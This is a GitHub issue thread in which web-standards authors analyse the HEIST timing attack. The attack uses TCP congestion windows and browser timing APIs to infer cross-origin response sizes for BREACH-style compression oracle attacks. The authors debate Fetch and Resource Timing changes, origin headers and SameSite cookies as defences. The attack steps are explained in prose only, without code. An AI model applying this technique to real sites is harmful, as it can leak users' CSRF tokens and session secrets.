Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

HEIST #64

Closed
igrigorik opened this issue Aug 4, 2016 · 74 comments
Closed

HEIST #64

igrigorik opened this issue Aug 4, 2016 · 74 comments
Labels
security-tracker Group bringing to attention of security, or tracked by the security Group but not needing response.

Comments

@igrigorik
Copy link
Member

HEIST paper, ArsTechnica coverage, Twitter discussion

Reading through the paper, the core observation is: TCP congestion control can be (ab)used to infer size of a (cross-origin) resource. Roughly:

  • Identify when response headers are received:
  • Identify when the response body has finished loading
    • XHR readyState (DONE), onload() callbacks, Resource Timing’s responseEnd.

Given both of the above, you can compute the time delta between when the headers were received and response end:

  • If delta is small then headers and response fit into same congestion window
  • If delta is large then with high probability the response exceeded current congestion window (took multiple RTTs)

If TCP connection is brand new, the above can effectively tell you if response is <14KB. An extended version of this for beyond IW10 is:

  • Open a connection and fetch a resource of known size to “pad” the congestion window with known amount of data.
  • Request resource you want to know the size of and observe if it comes back in one or multiple RTTs - same criteria as above.

Aside, but related, it’s possible to estimate RTT via javascript: if you know the RTT and have a model for what you expect the congestion window to be, you can use that observe if response took >1 RTT and arrive at same results with similar padding technique (knowledge of when response headers are received improves accuracy, but not necessary).

Armed with above, you can apply a compression oracle attack against the origin, ala Breach. That said, I’m dubious of the claims in the paper about how practical this actually is: tripping over a congestion window boundary doubles said congestion window and that ramps quickly and hence the query rate should be low... Am I missing something here?

Mitigations: all existing BREACH recommendations apply.


In terms of practical implications... /cc @annevk @slightlyoff @domenic

  • XHR / Fetch expose reponseStart for cross-origin resources; RT requires TAO.
    • Q: Anything we want or need to do here?
  • There are many ways to infer responseEnd..
    • Q: I’m not sure if and what can be practically done here?

Last but not least, scrubbing through RT spec it looks like we introduced a bug in 88bb585?diff=split#diff-eacf331f0ffc35d4b482f1d15a887d3bL543 ~implying that responseEnd is subject to TAO. It's not.. Unless @plehegar had something else in mind here?

@igrigorik igrigorik added the security-tracker Group bringing to attention of security, or tracked by the security Group but not needing response. label Aug 4, 2016
@domenic
Copy link

domenic commented Aug 5, 2016

I could use some help understanding how this attack works cross-origin. Shouldn't the fetch/XHR/resource timing/etc. automatically and instantly fail for such resources? (Assuming they are not shared via CORS.)

@danaucoin
Copy link

danaucoin commented Aug 5, 2016

CSP headers would be needed as they handle the outbound rules. GET and POST aren't blocked by CORS.

@annevk
Copy link
Member

annevk commented Aug 5, 2016

So one problem is that fetch() also resolves for "no-cors" when all headers are in. In combination with something else, e.g., <img>, you can then probably more accurately measure a response body. A mitigation would be to wait resolving fetch() for "no-cors" until the response body is fully transmitted.

@annevk
Copy link
Member

annevk commented Aug 5, 2016

I think whatwg/fetch#355 is the solution here, though it would be interesting to hear from @tomvangoethem and Mathy Vanhoef why they think that is infeasible (per section 4.1.1 of their paper).

@annevk
Copy link
Member

annevk commented Aug 5, 2016

As @jakearchibald mentions that issue has obvious perf implications that are not desirable. Arguably resource timing should not expose responseEnd for no-cors, especially since it's not always readily available (it's not with fetch()). That still makes the platform susceptible to attacks that use multiple requests, one to figure out "start" and another for "end" (e.g., <iframe> load). However, that will get muddy with HTTP caches and such. We can also fiddle with when we expose "end" by delaying responses a little bit, but that would impact rendering.

None of this is ideal obviously.

@jakearchibald
Copy link

Would padding end impact render? The rendering of an iframe can't be detected. The width/height of an image can, but that's way before response end

@jakearchibald
Copy link

The problem is response timing is designed to give an accurate number here, and that's baaad. Others we can (hopefully) make less accurate.

@yoavweiss
Copy link
Contributor

yoavweiss commented Aug 5, 2016

I'm wondering if we're not trying to route around the problem in hope that it would go away instead of tackling it. As mentioned in #64 (comment), RTTs can be measured without any fancy APIs, using <img onload>. Determining if a certain resource download took 1 or 2 RTTs doesn't require sub-millisecond precision in today's networks, unless the user is in the same data-center as the origin.

So, unless we're willing to delay certain events (and observable implications of resource loading) in tens of milliseconds to all users, this type of timing attack is not going away.

The underlying issue is that with BREACH, exposing response sizes equals exposure of CSRF tokens and login cookies. Are all types of compression vulnerable to BREACH? Can we devise a compression scheme that won't be? (e.g. by adding random padding chars of random size </naive-hand-waving>)

@domenic
Copy link

domenic commented Aug 5, 2016

@yoavweiss can you produce a demo of this attack using only <img onload>, if that's all that's required? That would certainly make your point clearer.

@jakearchibald
Copy link

Delaying iframe load events seems ok, as long as it's fired after the frame has loaded.

Img is only useful if the response is a valid image, otherwise error can happen early.

@yoavweiss
Copy link
Contributor

An image resource on the same host as the HTML under attack can be used to measure the RTT, as demonstrated in the article @igrigorik linked to. Since that article, img loading became async (in most browsers), but an attacker could probably use RAF in order to estimate the time gap between adding the img and when it's actually triggered. That code snippet above ignores potential connection establishment time which can skew its results, but that can be mitigated with <link rel=preconnect>, or by simply repeating an image fetch from the same host twice.

That would give an attacker one piece of the puzzle, which is the base RTT. And even if we'd delay <img onload>, this won't be mitigated until we would also delay the time in which the image request switches to the "partially available" state, since that time is highly observable, due to intrinsic dimensions changes. All image types but certain JPEGs are likely to switch to that state right when the first few bytes of image data get in.

@domenic - I hope that makes what I meant by "RTTs can be measured without any fancy APIs, using <img onload>" clearer.

Regarding delaying <iframe>'s onload, it might be helpful, but we'd need to delay it by a lot and we'd also need to delay onload for <script>, <link> and potentially others. Processing of the returned response on some of those might be observable, so we'd need to carefully figure that out and avoid such processing.

@jakearchibald - would we also need to introduce similar delays to the time fetch() promises are resolved in SW?

@annevk
Copy link
Member

annevk commented Aug 5, 2016

RTT is not that useful on its own I think. What is important is time-to-headers, time-to-end-of-response-body, the difference between those, how much we expose in a single roundtrip, how much is exposed on several roundtrips, and how reliable those all are.

We can prevent exposing time-to-headers for no-cors, but the cost is a performance hit when you use service workers. (And an argument has been made that we also expose time-to-headers when you enable CORS, since CORS will fail at that point, but the request will also be different.)

We can also prevent exposing time-to-end-of-response-body for no-cors, at no cost, but then the question is whether you can still reliably determine it across several roundtrips and whether that is problematic.

@danaucoin
Copy link

Excusing my ignorance in advance -

If the purpose of resource timing is to provide performance metrics (effectively a reporting tool) to a web dev/web admin, why does the API have to return those statistics directly to the requester? Shouldn't the resource timing data be sent to a specified (by the page) directive, and not necessarily back to the requester?

@yoavweiss
Copy link
Contributor

RTT is not that useful on its own I think. What is important is time-to-headers

Good point that RTT and time-to-headers are only ~identical with static resources, where HEIST mostly targets dynamic components of a page (CSRF, cookies) which generation can add server-side time.

We can also prevent exposing time-to-end-of-response-body for no-cors

Can you elaborate on that?

@annevk
Copy link
Member

annevk commented Aug 5, 2016

Can you elaborate on that?

By not handing out responseEnd. That way if you get time-to-headers with fetch(), you don't get time-to-end-of-response-body. (You might still get that in some other way, but that would be a different request, and then the other variables come into play.)

@annevk
Copy link
Member

annevk commented Aug 5, 2016

@djohns14 I'm not sure what you're suggesting, but changing the fundamental nature of any API under discussion is not an option.

@jakearchibald
Copy link

I don't think a CORS request and a no-cors request are different enough to matter much, but maybe I'm missing something.

In terms of response end, we need to delay cache put, which is fine as it isn't all that perf sensitive. We might need to think about appcache writes too.

@sleevi
Copy link

sleevi commented Aug 5, 2016

From the peanut gallery, it does seem strongly inadvisable to try to just monkey-patch around this without articulating your threat model or assumptions. I think @yoavweiss has the right idea, which is pointing out we have a variety of leaks.

It's also important to keep in mind the context of what we're discussing, re: BREACH attacks, and the available server-side mitigations for these.

I'm not suggesting we "do nothing", but rather we work from first principles to make sure the platform is both secure and consistent. Minimally, that starts with elaborating the actual threat model we're wishing to defend against. Are we attempting to stop BREACH attacks? Are we attempting to stop knowledge of response body size? etc. Once we get those principles down, collectively take a look at the platform and look where we can leak that information, so we have a sense of the damage, and then we can brainstorm mitigations.

While this is very exciting, sexy, and arguably disturbing (in that "We probably should have seen this coming" feeling afforded by 20/20 hindsight), we shouldn't be reactionary. In my mind, this strikes as similar to concerns regarding privacy/tracking: concerns which are real, and grounded, but when you see something like https://www.chromium.org/Home/chromium-security/client-identification-mechanisms , you have a better appreciation for the holistic picture and where and why various piece-meal solutions ... aren't.

But that's just my $.02

@igrigorik
Copy link
Member Author

@sleevi 100% agree. I'll take a run at it...

Cross-site timing attacks

Make a cross-origin request and observe some properties of it: how long it takes to error, succeed, whatever. The canonical example here is to make an authenticated request (e.g. load an image) against some behind-the-login-screen resource and time the response: if the user is logged in they’ll get back the page and otherwise a login page/redirect; the delta between those responses may be large enough to learn something about the user.

Practically speaking, I don’t think the UA can “defend” against this type of attack as long as it allows any form of cross-origin authenticated requests, as the timing is subject to server-specific logic and response processing. We’re not going to enforce a constant time on all responses (that’s ludicrous), and padding random deltas to responses is similarly silly.. you’d have to make those very large, and the performance implications of that would be unacceptable.

The server, on the other hand, can and should protect its sensitive resources against such attacks. Set X-Frame-Options and inspect the Referrer header and adjust the response accordingly... i.e. existing best practices. Also, as a user, I guess you can disable third-party cookies.

In practice these timing attacks are also hard to exploit due to variable response times, network latency, buffering delays, etc. HEIST offers an accuracy improvement: use TCP congestion window to trigger an extra RTT to learn information about the size of the resource. I still have reservations about how many queries you can practically make with this approach, but regardless, it is an improvement on what was documented earlier.. and hence server-side mitigations mentioned earlier are only ever more relevant.

Compression oracle attacks

These attacks require (a) mechanism to estimate size of encrypted response and (b) ability to reflect known data within the response. HEIST outlines how you can use TCP’s congestion window to achieve (a). You then need to find a target that satisfies (b)... Mitigations: all the same as above, plus other precautions like masking your tokens on each request.


Re, responseEnd: you don’t need Resource Timing to get at this data. You can time the duration of a network fetch by simply timing an image/object load to get the duration of the fetch, and I’m sure there are other more creative ways to obtain this as well. Resource Timing doesn’t expose anything new here and hiding responseEnd / duration for cross-origin resources doesn’t win us anything. Conversely, duration is a critical datapoint for sites that embed third-party content and need to monitor their impact on site performance.

Re, fetch resolving on headers: the reason this one is used in HEIST is because it allows the attacker to measure [time to first byte, time to response end] delta and obtain a more accurate answer for whether the body came in within one RTT of header data or if it was split over multiple RTTs. That said, even without this mechanism, the attacker can estimate the RTT by making other requests / observing traffic and then subtract that from total fetch duration to get a similar estimate for whether a request triggered extra RTT due to exhausted CWND. The latter approach is less accurate, but my hunch is that not significantly so once you apply any statistical method (i.e. gather this across multiple responses). On the other hand, just because you know when the header came in also doesn’t mean you can reliably state that a response that is less than the current-CWND will arrive within one RTT—e.g. packet drops and reordering, high BDP between client and server, random buffer delays along the way, etc. So.. shrug, you win some, you lose some, but the exposure is still there regardless.


With above in mind... We already knew that timing and guesstimates on response size can be used as a side channel and we have established best practices that app developers should deploy to protect themselves. HEIST is a reminder for why those are important and at least as far as I can tell, if the origin has already taken precautions against BREACH, then HEIST doesn’t add any new surface area. I think that's the main message and takeaway from this exercise.

Discussed changes to RT/Fetch won't solve the underlying attacks. They may reduce accuracy in some instances, but (a) it's not clear how much so, and (b) they would introduce significant negative performance implications for the rest of the platform.. Which makes me think that the tradeoff, at least for the options on the table so far, is not worth it.

@tomvangoethem
Copy link

The reason we didn't consider resolving fetch() until the complete body is in as a complete solution, was because if there is just a single observable event (either directly or indirectly) that happens when the headers of an opaque response are in, the attack resurfaces. While it may be possible to track down all the directly observable events, I am not convinced all possible side-channels can easily be identified.

Knowing the time-to-headers is indeed not a requirement. On connections where the jitter/RTT ratio is small, it shouldn't be too hard to determine whether 1 or 2 RTTs were needed (in contrast to 0 vs 1 in HEIST). As such, just knowing time-to-end-of-response-body will probably be enough.

Ideally, I would like to see a general defence where it's simply not possible to perform these attacks, regardless of the possible side-channels that may be exploited. Currently, the only way I see how this would work is by disabling authenticated no-cors requests (or simply stripping the cookies).

We are currently exploring a general technique based on leveraging the DEFLATE algorithm to counter BREACH-like attacks. However, simply knowing the length of a resource (regardless of compression) has its own security/privacy consequences (see whatwg/storage#31 for example).

@jakearchibald
Copy link

If we rebooted the web today, any cross-origin communication would require CORS, or be no-credentials like you suggest.

I just don't see how we can do that now with 20 years of content depending on current behaviour.

@jakearchibald
Copy link

We could have a header to opt out of no-cors access, similar to https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options

@jakearchibald
Copy link

I realise an opt-in isn't ideal, but some kind of Access-Control-Allow-Credentials: NEVARR! header would also mitigate whatwg/html#1427

@annevk
Copy link
Member

annevk commented Aug 6, 2016

See my From-Origin header from some years back. We want something that prevents embedding from the wrong origin, including nested browsing contexts, but does not prevent top-level navigation. Note that omitting credentials does not help with intranet resources necessarily.

@jakearchibald
Copy link

jakearchibald commented Aug 6, 2016

https://www.w3.org/TR/from-origin/

Seems like what we're after (if opt-in in the best we can do), but should apply to all requests, not just embedding (maybe this is the intent, the spec talks about embedding a lot). What stopped work on this?

@annevk
Copy link
Member

annevk commented Aug 6, 2016

Yeah, it needs some tweaks, but we should not block top-level navigation. (And maybe we should continue allowing requests without credentials…)

Work stopped since nobodywanted to implement.

@jakearchibald
Copy link

we should not block top-level navigation

target="_blank" should be ok too, since the client doesn't have access to a load event. window.open with noopener prevents load events too I think?

@annevk
Copy link
Member

annevk commented Aug 6, 2016

Yeah, probably. I'd like to sort out the whole popups a think a bit more and which browsing contexts end up being in a group together before firmly answering that. But definitely "noopener" has the semantics of creating a top-level rather than auxiliary browsing context.

So yeah, maybe reviving that header in some form in Fetch is a good step towards offering some kind of protection against this. Especially now https://w3c.github.io/webappsec-epr/ is being parked.

@annevk
Copy link
Member

annevk commented Aug 11, 2016

@jakearchibald no, but see my speculation above how it's likely due to CORS.

@igrigorik
Copy link
Member Author

(side note: Adam pointed out that I was linking to an outdated draft earlier in the thread, we should be referring to The HTTP Origin Header Field in RFC6454 instead).

I asked Adam about the change from "MUST send" in earlier drafts to "MAY send" in the RFC: "the IETF didn't want to publish a spec that made every existing HTTP implementation non-conformant". That said, note that UA requirements section leaves this wide open:

The user agent MAY include an Origin header field in any HTTP request.
Whenever a user agent issues an HTTP request from a "privacy-sensitive"
context, the user agent MUST send the value "null" in the Origin header field.

NOTE: This document does not define the notion of a privacy-
sensitive context. Applications that generate HTTP requests can
designate contexts as privacy-sensitive to impose restrictions on
how user agents generate Origin header fields.

So, change from MUST to MAY is/was a spec-compat issue. The UA is free to send Origin on any request, and it seems that current implementations simply chose to limit themselves to CORS and POST requests. Which, given what we know today, is a decision that we should probably revisit...

  • ~Send Origin on any cross-origin request (cors and no-cors)?
  • ~Define some interop with Referrer. E.g. if Referrer policy is set to none, then send "null" in Origin header, or some such.

@jakearchibald
Copy link

jakearchibald commented Aug 11, 2016

Send Origin on any cross-origin request

It would need to be on all requests right? If I'm trying to emulate From-Origin, I only want to respond if Origin is my origin. Still need a header that indicates top-level vs aux.

@annevk
Copy link
Member

annevk commented Aug 11, 2016

Again, I don't think we can send Origin on any request and I'm pretty sure Adam found that out too when he tried back in the day. Especially now CORS is much more in use it's highly likely servers use it as conditional and end up breaking navigation and such.

@igrigorik
Copy link
Member Author

@jakearchibald if all UA's sent Origin on every cross-origin request (cors and no-cors) then the absence of such header would allow the server to restrict responses to "my origin only", as well as whitelist particular origins. That said, since we already have Origin implementations out in the wild that don't conform to this... it makes it complicated to deploy. With that in mind:

  1. @annevk, your Origin proposal in Should we send an Origin header for no-cors fetches? whatwg/fetch#225 (comment) makes sense to me.
  2. By the looks of it, we need new Bikeshed header (le sigh.. but at least now we know what we need to solve for :)) that would cover the no-cors cases, top-level vs aux, etc.

@jakearchibald
Copy link

@igrigorik good point. I was thinking no-referrer would also remove the origin header, but it would make it explicitly null. Happy for Bikeshed to follow these rules.

So are you suggesting that Bikeshed would also include the top-level/aux info rather than a seperate header? I guess that's fine, just needs more parsing.

One less header to vary on.

@igrigorik
Copy link
Member Author

Tried to write down what we could recommend to developers with existing mechanisms...


Use First Party (FP) cookies for all authenticated content that's not meant to be embedded or accessible cross-origin: "Strict" mode provides strong protection, "Lax" provides reasonable protection (modulo top-level navigations). With FP in place...

If Origin header is present in the request, then it's either a CORS request, or a request whose method is neither HEAD or GET (whatwg/fetch#225 (comment)). Inspect the value of Origin header for the source origin of such requests to determine if you want to allow such request - see HTTP access control (CORS).

Otherwise, if Origin request header is missing, the request is either:

  • same-origin, in which case the FP cookie should be present.
  • cross-origin, in which case the FP cookie is subject to policy and initiator:
    • If FP policy is "Strict", then the cookie should not be there.
    • If FP cookie policy is "Lax", then FP cookie is only present for top-level navigation requests that use a "safe" HTTP method.
      • When using "Lax" FP policy you can distinguish same-origin requests and cross-origin top-level navigation requests by inspecting the Referrer header: as long as your policy is not set to no-referrer, same-origin requests will contain a Referrer header whose origin is your origin.

BigBank.com has authenticated resources that should not be accessible cross-origin. It can either:

  1. set FP cookie policy to "Strict" and be done with it.
  2. set FP cookie policy to "Lax" and use combination of Origin and Referrer headers to distinguish between same-origin requests and cross-origin top-level nav requests, and potentially disallow the latter.

Do we need anything else? It seems like combination of FP, Origin, and Referrer might do the trick.

@annevk
Copy link
Member

annevk commented Aug 12, 2016

We can only give this advice if a) all browsers implement same-site cookies, b) all browsers implement the "new" Origin header semantics, c) we couple it with an HTTPS requirement.

And again, this does not deal with 1) HTTP authentication, 2) TLS client certificates, 3) firewalled content.

@annevk
Copy link
Member

annevk commented Aug 12, 2016

If we did Bikeshed by the way, I think b) would be better addressed by all browsers implementing Bikeshed and only using Origin for CORS as that would improve the CORS protocol.

@igrigorik
Copy link
Member Author

Contrary to what many may believe, I do prefer solutions that avoid minting new headers. :bowtie: Especially so when we're talking about a header that would have to be attached on most every request—which, I think, is what were looking at here. Hence, me trying to understand if we actually need a new header, of if we can compose a solution out of existing parts.

We can only give this advice if a) all browsers implement same-site cookies, b) all browsers implement the "new" Origin header semantics, c) we couple it with an HTTPS requirement.

As far as I can tell, Chrome is already effectively (b), we have (a) on the way, and in this day and age (c) goes without saying... 😎 . Further, both (a) and (b) have existing efforts behind them, so if we can give them a kick through additional use-cases/motivation, then that's a win in my books. Building our own thing will take just as long if not longer.

That aside, you're right, I ignored HTTP/TLS auth and firewalled content. It wasn't clear to me how it impacts what we're discussing here.. can you elaborate a bit more?

@annevk
Copy link
Member

annevk commented Aug 13, 2016

You could still do timing attacks on resources that are firewalled or HTTP/TLS authenticated. Basically the same as with cookies.

(It's not entirely clear by the way what Origin adds over just using lax cookies.)

@igrigorik
Copy link
Member Author

You could still do timing attacks on resources that are firewalled or HTTP/TLS authenticated.

Hmm, well.. you could just drop a first-party cookie on any such resources, right? Same logic.

It's not entirely clear by the way what Origin adds over just using lax cookies.

Yeah, that's fair, you can probably simplify my earlier post to FP + Referrer.


Stepping back, we covered a lot of ground in this thread.. My takeaways:

  • we are not making any changes to Fetch or Resource Timing
  • we should encourage developers to deploy server-side logic to protect sensitive resources
    • BREACH recommendations apply but we established that Referrer alone is not sufficient
    • First-Party cookies goes a long way towards resolving this problem:
      • In strict mode, it provides strong protection.
      • in lax mode, it can be combined with Referrer to provide strong protection.

With above in mind, I propose that we resolve this thread and go nudge folks working on FP. I can writeup a summary of our discussion here.

@jakearchibald
Copy link

jakearchibald commented Aug 15, 2016

in lax mode, it can be combined with Referrer to provide strong protection.

It's still not clear to me when cookies would be sent with "lax" mode. What about:

I don't see how referrer helps here either. If you're vulnerable to GET, you're in a really bad place.

@igrigorik
Copy link
Member Author

It's still not clear to me when cookies would be sent with "lax" mode.

The behavior is defined in https://tools.ietf.org/html/draft-west-first-party-cookies-07#section-4.3. If that's not sufficient, then we should open a bug against httpwg: https://github.com/httpwg/http-extensions/issues?q=is%3Aopen+is%3Aissue+label%3A6265bis /cc @mikewest @mnot

Re, prerender: I'll followup on the linked issue.

igrigorik added a commit that referenced this issue Aug 15, 2016
This was mistakenly introduced in a previous [1] refactoring of the
spec. For related discussion, see [2].

[1] 88bb585
[2] #64
@igrigorik
Copy link
Member Author

Updated RT spec (7358cbd) and removed the (broken) TAO-check reference -- see my very first post + linked commit on this thread for details. I believe that's the only actionable change for RT from this discussion.. If anyone else has other suggestions, let me know.

@jakearchibald
Copy link

Seems like <a href="…" target="_blank"> does not create a top-level browsing context. That's not so great, I'd expect to get cookies in "lax" mode in that case.

window.open won't get cookies, which is great (although we may want to allow them with the noopener option. clients.openWindow() is top level, so it will get cookies.

@jakearchibald
Copy link

Filed httpwg/http-extensions#226

@annevk
Copy link
Member

annevk commented Aug 16, 2016

Hmm, well.. you could just drop a first-party cookie on any such resources, right? Same logic.

I don't understand.

@mikewest
Copy link
Member

mikewest commented Aug 16, 2016

Use First Party (FP) ...

Nit: We renamed this before shipping, so if/when you write anything up, please try to minimize the confusion. :)

<a href="…"> - yes
<iframe> - no
window.open() - I would hope no
<a href="…" target="_blank"> - I would hope yes
clients.openWindow() - I would hope yes
<link rel="prerender"> - ??? (hence w3c/resource-hints#63)

As noted in the bug Jake filed against SameSite, Lax same-site cookies would be sent with all of these (presumably cross-origin) (pre-)navigations, with the exception of <iframe> (because auxiliary browsing contexts are also top-level browsing contexts). That was intentional, as SameSite's target was CSRF, so the request is what mattered for the cookie state, not the exposure via Window objects.

@igrigorik
Copy link
Member Author

@annevk as in, regardless of what authentication mechanism you use (HTTP auth, TLS auth), when you first authorize the user you can just drop a SameSite cookie and then observe if it's echoed in subsequent requests to identify if its origin is same or cross origin.

@annevk
Copy link
Member

annevk commented Aug 16, 2016

I'm starting to agree with @mikewest's remarks elsewhere that the opt-in defense is not ideal and unlikely to be deployed. But I'm not sure how we can do better, other than maybe making the opt-in not rely on new cookie infrastructure, but something closer to a boolean.

@sleevi
Copy link

sleevi commented Aug 16, 2016

While I'm sympathetic to @mikewest's position, I'm absolutely convinced this is not something that the browser caused, contributes to, or can fix at this point. This is, at the core, similar to something like SQL injection - it's a server choice (to compress responses), and using compression - whether over a secure channel or otherwise - leaks status information.

While I appreciate @igrigorik's efforts at coming up with a threat model, I think it's utterly futile to suggest that the browser could be in a position so it could make all loads unobservably side-effect free, without the cooperation or knowledge of the server. There are going to be timing leaks throughout the system - whether at the CPU cache layer, at the IO interrupt layer from the NIC, from contention on the network, from congestion windows, from system timers - all of these things outside of the browsers' ken and remit. We simply can't design a system that, under this threat model, is constant-time, and without that aspect of constant-time, we cannot guarantee that the secrets remain secret.

So we have to do one of two things - prevent requests from being made that might result in secrets being sent, or help server operators understand the risks of sending secrets. While SameOrigin or Bikeshed or whatever we want can quais-help with the former, the past two decades of the Web have also taught us that servers are, almost universally, very bad at determining what is or should be secret (case study: The opposition to HTTPS). So even if we were to prevent most (all?) forms of cross-origin credential sharing, there's going to be secrets, and so there's going to be side-channels here. Which leads to the only other option that seems at all practical, which is educating at a server side.

I think the focus on the "Web Platform Features" enabling this are arguably misguided, because what we're talking about is the ability for constant-time vs variable-time, and anyone who works in that space can tell you how hard it is to make sure it's right.

To the extent we could block cookies (and TLS client certs, and whatever H/2+TLS1.3 method the IETF comes up with), great, but I think we know that the risk of breakage is high for any solution, because it's not backwards compatible, and thus our option is "Opt In". Or tell servers to stop supporting compression if they can't do it securely. Or stop advertising in browsers that we support compression.

@igrigorik
Copy link
Member Author

I think it's utterly futile to suggest that the browser could be in a position so it could make all loads unobservably side-effect free, without the cooperation or knowledge of the server. So we have to do one of two things - prevent requests from being made that might result in secrets being sent, or help server operators understand the risks of sending secrets.

Agreed, and my direction here has been to figure out what (if anything) we need to give server operators to make it possible to make an informed decision on their end for whether the response should be allowed to contain secret / authenticated data.

I think the focus on the "Web Platform Features" enabling this are arguably misguided, because what we're talking about is the ability for constant-time vs variable-time, and anyone who works in that space can tell you how hard it is to make sure it's right.

So, to clarify.. The problem, as I see it, is that we allow authenticated cross-origin requests that the origin server can't distinguish from same-origin requests. As a result, the server ends up leaking secrets because existing recommendations (e.g. look at Referrer / Origin headers) would also block top-level navigations. So, we do need some new "web platform feature" to allow servers to solve this.. SameOrigin cookies might be sufficient, or maybe we need Bikeshed instead.

@igrigorik
Copy link
Member Author

A quick summary of our discussion here: https://www.igvita.com/2016/08/26/stop-cross-site-timing-attacks-with-samesite-cookies/ - tl;dr: use SameSite cookies.

As outlined in #64 (comment), we are not making any changes to RT or Fetch; closing this thread. Perhaps there are other mechanisms we ought to consider, in addition to encouraging adoption of SameSite cookies, but whatever that may be.. we should take that discussion to the appropriate forum (webappsec group, probably).

p.s. thanks everyone for your help and input!

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
security-tracker Group bringing to attention of security, or tracked by the security Group but not needing response.
Projects
None yet
Development

No branches or pull requests

9 participants